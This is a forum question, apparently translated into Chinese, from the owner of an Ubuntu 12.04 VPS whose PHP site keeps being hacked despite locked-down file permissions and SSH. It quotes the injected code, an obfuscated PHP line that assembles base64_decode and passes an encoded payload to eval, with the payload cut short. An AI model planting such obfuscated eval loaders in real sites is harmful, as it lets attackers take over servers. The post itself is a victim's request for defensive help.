0 security php permissions vps ubuntu-12.04
我使用 Vesta 运行 Ubuntu 12.04 x64 VPS,以及一个 PHP 站点。它已被多次入侵,注入的代码如下所示:
<?php $KoDgalxVvsZfidVcEOTJDeMX='ba'.'se6'.'4_deco'.'de';eval($KoDgalxVvsZfidVcEOTJDeMX("cHJlZ19yZXBsYWNlKCIvN0xna0xnND1IR2JEOGs2WDht....
为了修复它,我决定将所有文件的权限和所有者更改为 555 和 root,因此没有用户可以更改文件。我删除了 FTP 访问并保护了 SSH,因此只有我在 VPS 中拥有的密钥才能连接。
尽管进行了所有这些更改,但其他用户始终可以更改文件、重命名文件夹和上传另一个被黑的文件。
你认为我缺少什么?有什么建议吗?谢谢!如果您需要有关此问题的更多信息,我将很乐意与您分享,以帮助其他遭受同样邪恶之苦的人!
| 归档时间: |
|
| 查看次数: |
4496 次 |
| 最近记录: |